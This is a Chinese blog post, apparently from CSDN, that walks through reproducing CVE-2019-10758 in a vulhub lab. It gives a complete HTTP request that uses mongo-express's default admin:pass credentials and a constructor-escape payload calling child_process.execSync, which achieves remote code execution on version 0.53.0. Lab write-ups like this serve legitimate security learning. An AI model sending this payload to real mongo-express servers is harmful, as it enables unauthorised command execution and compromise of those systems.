vulhub漏洞复现40_Mongo-express

本文详细介绍了CVE-2019-10758,这是一个针对mongo-express的严重漏洞,允许攻击者在未修改默认凭证的情况下执行任意node.js代码。通过启动一个0.53.0版本的mongo-express靶场并发送特定数据包,可以复现漏洞,导致`touch/tmp/success`命令被执行。该漏洞提醒用户务必更改默认凭据以增强安全性。
摘要由CSDN通过智能技术生成

CVE-2019-10758_mongo-express 远程代码执行漏洞

漏洞详情

mongo-express是一款mongodb的第三方Web界面,使用node和express开发。如果攻击者可以成功登录,或者目标服务器没有修改默认的账号密码(`admin:pass`),则可以执行任意node.js代码。

漏洞环境

靶场:192.168.4.10_ubuntu

执行如下命令启动一个0.53.0版本的mongo-express:

```bash

docker-compose up -d

```

环境启动后,访问`http://your-ip:8081`即可查看到Web页面。

漏洞复现

直接发送如下数据包,即可执行代码`this.constructor.constructor("return process")().mainModule.require("child_process").execSync("touch /tmp/success")`:

```

POST /checkValid HTTP/1.1

Host: your-ip

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Authorization: Basic YWRtaW46cGFzcw==

Content-Type: application/x-www-form-urlencoded

Content-Length: 124

document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("touch /tmp/success")

```

"touch /tmp/success"成功执行

 

 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值